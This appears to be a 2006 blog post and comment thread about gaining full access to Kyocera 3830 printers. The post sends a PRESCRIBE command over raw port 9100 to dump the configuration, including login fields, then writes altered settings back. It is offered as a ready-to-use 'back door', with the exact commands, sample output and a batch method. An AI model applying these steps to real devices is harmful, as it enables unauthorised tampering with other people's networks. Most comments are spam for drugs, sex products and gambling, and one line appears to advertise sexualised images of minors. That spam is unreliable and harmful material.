Kyocera printers have various security flaws. Most of them can be telnetted to on the default port and accessed with the default username ‘admin’ and blank password. There is a very decent menu interface to change everything.
For the Kyocera 3830, which is a current model workgroup printer they disabled the telnetting to the default port for ’security’.
These printers, if they can be accessed, can provide up to around 100mb of storage, email facilities, networking information and various other details.
The 3830’s have a back door. Telnetting to port 9100 (the printer data port) allows you to send raw text to the printer, but if you drop the correct command in at this point, you can get full access to the printers settings. So here we go.
Telnet to port 9100 of a 3830.
Drop in this command and save the output:
!R!SIOP0,”COMREADBACK:0″;EXIT;
This will give you output similar to this:
CMNT Offset 0x006a Size = 1 ; SIOP0,"CUSTOM:Network Status Page = 0";
CMNT Offset 0x006b Size = 1 ; SIOP0,"CUSTOM:TCP/IP BOOTP = 0";
CMNT Offset 0x006c Size = 1 ; SIOP0,"CUSTOM:TCP/IP Protocol = 1";
CMNT Offset 0x006d Size = 1 ; SIOP0,"CUSTOM:TCP/IP DHCP = 0";
CMNT Offset 0x006e Size = 1 ; SIOP0,"CUSTOM:RARP = 1";
CMNT Offset 0x006f Size = 1 ; SIOP0,"CUSTOM:ARP/PING = 1";
CMNT Offset 0x0070 Size = 4 ; SIOP0,"CUSTOM:IP Address = 172.16.1.212";
CMNT Offset 0x0074 Size = 4 ; SIOP0,"CUSTOM:Subnet Mask = 255.255.255.0";
CMNT Offset 0x0078 Size = 4 ; SIOP0,"CUSTOM:Default Gateway = 0.0.0.0";
CMNT Offset 0x007c Size = 256 ; SIOP0,"CUSTOM:Domain Name = ''";
CMNT Offset 0x017c Size = 4 ; SIOP0,"CUSTOM:DNS Server (Primary) = 0.0.0.0";
CMNT Offset 0x0180 Size = 4 ; SIOP0,"CUSTOM:DNS Server (Secondary) = 0.0.0.0";
CMNT Offset 0x0184 Size = 4 ; SIOP0,"CUSTOM:WINS Server (Primary) = 0.0.0.0";
CMNT Offset 0x0188 Size = 4 ; SIOP0,"CUSTOM:WINS Server (Secondary) = 0.0.0.0";
CMNT Offset 0x018c Size = 225 ; SIOP0,"CUSTOM:Scope ID = ''";
CMNT Offset 0x026d Size = 1 ; SIOP0,"CUSTOM:NetWare Protocol = 1";
CMNT Offset 0x026e Size = 1 ; SIOP0,"CUSTOM:Frame Type = 1";
CMNT Offset 0x026f Size = 1 ; SIOP0,"CUSTOM:Operation Mode = 1";
CMNT Offset 0x0270 Size = 32 ; SIOP0,"CUSTOM:Print Server Name = 'admin'";
CMNT Offset 0x0290 Size = 32 ; SIOP0,"CUSTOM:Login Password = ''";
CMNT Offset 0x02b0 Size = 2 ; SIOP0,"CUSTOM:Queue Polling Interval = 4";
CMNT Offset 0x02b2 Size = 1 ; SIOP0,"CUSTOM:NetWare Banner Page = 1";
CMNT Offset 0x02b3 Size = 1 ; SIOP0,"CUSTOM:Bindery Mode = 1";
CMNT Offset 0x02b4 Size = 32 ; SIOP0,"CUSTOM:File Server 1 = ''";
Now, if you want to change a setting just grab the part after the ‘offset ;’ section, insert your own text/ip address/whatever and throw it back on to the 9100 connection.
!R!SIOP0,”CUSTOM:LP1 End of Job String = ‘!R! RES; EXIT;’”;EXIT;
Your other option is to stick all the commands in a text file then do this from the unix prompt (without quotes):
lp -d”printername” “textfilename”
Done and done.
February 16, 2006 at 9:47 pm
First comment.
good stuff, I will have to try this when i come across one in the future.
February 17, 2006 at 1:50 am
Tried it and worked. Command references for KM printers available(which can be sent to port 9100)? Any pointers? Thanks in advance.
February 17, 2006 at 6:33 am
Glub says:
Without showing how to secure this loophole, this hack sends the wrong message. Master evader, you should know better, this will attract the black hats to your site, instead of the white. The printers are unsecured for a good reason, its boring. The consequence of teaching black hats to modify strings directly – script kiddies following you around.
February 17, 2006 at 9:43 am
MisterT: Any commands that appear in the COMREADBACK output can be pushed back to the printer to change settings. Have a look at my example again. It’s just the part after the ‘offset ;’ section.
glub: Didn’t want anyone with a hat at my site. It’s just some notes really and it is un-securable currently. The best you can do is change the default port to something else instead of 9100. This won’t stop a port scan though. Take it easy mate.
February 17, 2006 at 10:31 am
indeed, we were just under attack but luckly prevented this problem by changing the default password. however, you have to agree by saying that spreading such problems over the www without giving any solutions is totaly the wrong way.
February 17, 2006 at 12:41 pm
I agree presscut, but there is no fix I could post currently. Kyocera know about the problem, and call it a feature.
February 17, 2006 at 6:59 pm
nevermind… as long as there are filthy of loopholes in windows itself
February 19, 2006 at 5:07 am
OTOH if they can fraking telnet to your printers, you DESERVE this !!!
May 22, 2006 at 9:36 am
long beach hotels
upturning fliers NATOs factor regulative.stratify,overhead cheap hotel http://www.hotels-forum.com/
September 2, 2006 at 11:55 am
?
Download Cool Ringtone Right This Time: ?
December 8, 2006 at 7:18 pm
Buy Paxil
Buy paxil Buy cheap Paxil online order cheap Paxil online. Paxil
December 16, 2006 at 3:41 am
Bravo Kyocera Printers rules!
December 21, 2006 at 10:23 pm
Here is my comment it is a test
December 21, 2006 at 10:26 pm
<font size=”+1″>Men’s Penis Guide</font>
Penis enlargement pills, patches, extension devices and exercises reviewed by over 500 users. Find out if penis enlargement products actually work. <strong> <a href=”http://www.menspenisguide.com/” target=”_blank” > <BR> <font color=”blue” > <u>Click here to visit this penis enlargement website </u></font> </strong;> </a>
December 21, 2006 at 10:26 pm
%20 hello
February 13, 2007 at 11:16 pm
Accommodations offers, ski offers, photos, travel maps, travel tips, monasteries and touristic objectives.
April 26, 2007 at 8:44 pm
Omaha Holdem Betting
chasers thousandth combated.task!assigning
April 28, 2007 at 8:21 am
chinese baby girl
Catalogue of chinese baby girl.
April 29, 2007 at 9:37 pm
Gerneric Viagra
cutoff optimization perish:quartile passive
June 1, 2007 at 7:56 am
aim buddy free icon
Relevant aim buddy free icon
June 1, 2007 at 8:23 am
fosamax 10 mcg
Reviews on fosamax 10 mcg.
June 8, 2007 at 4:53 am
13 17 teen models
ka-ka-sh-ka 1065558 Relevant information about 13 17 teen models.
July 13, 2007 at 10:04 am
EWFEF
August 3, 2007 at 12:16 am
Purchase Cipro Online
Purchase Cipro Online
August 3, 2007 at 12:14 pm
Tamiflu
Tamiflu
August 3, 2007 at 4:38 pm
Purchase Depakote Online
Purchase Depakote Online
August 6, 2007 at 6:05 pm
free poker holdem survival kit
Some poker site offers a free download of the “Holdem Hustler Super Survival Kit” which did cost about 50 bucks. It includes free poker e-books and poker calculator. Well, it’s free anyway.
August 28, 2007 at 4:04 am
full tilt deposit bonus
full tilt deposit code
September 11, 2007 at 12:51 am
Cash Blitz Project
October 1, 2007 at 6:12 pm
credit cards low income
pros!hydrodynamics quiet styling conscription perspective
October 23, 2007 at 11:43 pm
163
November 3, 2007 at 8:12 am
ONLINE – DRUGSTORE!
PRICES of ALL MEDICINES!
FIND THAT NECESSARY…
VIAGRA, CIALIS, PHENTERMINE, SOMA… and other pills!
Welcome please: pills-prices.blogspot.com
NEW INFORMATION ABOUT PAYDAY LOANS!
Welcome please: payday-d-loans.blogspot.com
GOOD LUCK!
November 10, 2007 at 8:53 pm
phetermine buy online
phetermine buy online
December 22, 2007 at 3:42 pm
great
http://www.squidoo.com/natural-penis-enlargement-review
January 16, 2008 at 5:04 pm
dCralv hi great site thx http://peace.com
February 4, 2008 at 9:44 pm
mp3 ringtones free
Do free polyphonic ringtones for verizon phone free polyphonic ringtones for lg vx6000
February 5, 2008 at 2:14 am
Very very interesting article! You describe very important theme. I’m going to discuss about it in my blog to my readers. Unfortunately I’m late to write the same article in my blog. In the web are a lot of same sites and blogs but your differs markedly of its profundity.
March 11, 2008 at 11:34 pm
casino online italiano
Inoltre vincere casino online scaricare video poker
March 12, 2008 at 12:00 am
gioco pc casino
Giocare casino online italia casino italia gratis
March 23, 2008 at 4:40 am
“Kyocera printers have various security flaws. ” – this is not “various”, this is Huge securyty flaws.
Thnx for valuable info.
April 20, 2008 at 4:01 pm
way to increase your penis into bigger and longer one
April 21, 2008 at 1:25 pm
Kyocera? I know kyocera, but its not a printer here, they sell cellphones than printer
April 25, 2008 at 10:12 am
great site
May 14, 2008 at 9:26 am
[...] Not that it’ll do you much good–see previous note.) I’ve seen a pretty gnarly security exploit for Kyocera printers, which seems to bypass what little security is available, but I haven’t tested it on our unit [...]
June 16, 2008 at 6:29 pm
I wouldn’t own one of these junky brands. Stick with hp or lexmark. Those are much better quality.
July 24, 2008 at 10:26 am
ADT Home Security…
ADT Home Security…
August 23, 2008 at 7:36 am
Spermomax sexual enhancement pills actually make you cum more.
August 26, 2008 at 2:34 pm
i like those printers.
October 4, 2008 at 7:25 am
Rather interesting. Thanks for sharing this information, I’m looking into this and re reading again.
October 12, 2008 at 12:40 am
gonna try this hack
October 12, 2008 at 5:53 pm
Tried it and worked. Command references for KM printers available(which can be sent to port 9100)? Any pointers? Thanks in advance.
October 12, 2008 at 7:04 pm
I’ve never heard about this “Kyocera” printer, but if they have security flaws, the manufacturer should fix this. Thanks for sharing this information
December 5, 2008 at 6:57 am
Mobile Homes…
Manufactured housing can be a quality and economic alternative to traditionally built homes in tight financial times….
December 30, 2008 at 6:09 pm
Thanks for this Kyocera Printers. This tutorial will really help mine.
February 26, 2009 at 8:14 pm
sweet… thanks…
June 1, 2009 at 9:29 am
Thank you for this article. It really worked for me
June 20, 2009 at 10:55 am
I have been reading some very interresting stuff here, Good info. thanks for the Web view and keep up the good job
Maria
August 9, 2009 at 6:44 am
Thanks for the information. I will avoid Kyocera printers from now on
August 27, 2009 at 1:53 am
Top 10 Penis Enlargement reviews and Penis Health Information – We list and review the top clinically proven penis enlargement
October 9, 2009 at 11:39 am
Hey, you have a great blog here! I’m definitely going to bookmark you! Thank you for your info.And this is quick payday loan no credit check site/blog. It pretty much covers Quick payday loan no credit check related stuff. Thanks for sharing it!
October 18, 2009 at 8:37 am
i must say, your blog is very good, i will be checking back to read more
October 23, 2009 at 6:40 pm
“HP 11 Color Pack – High quality Compatible ink cartridges C4836AN cyan, C4837AN magenta and C4838AN yellow. We carry the highest quality products available in the market today. all the products are backed by our180-days satisfaction uarantee or your money back.
Hp Ink Cartridge“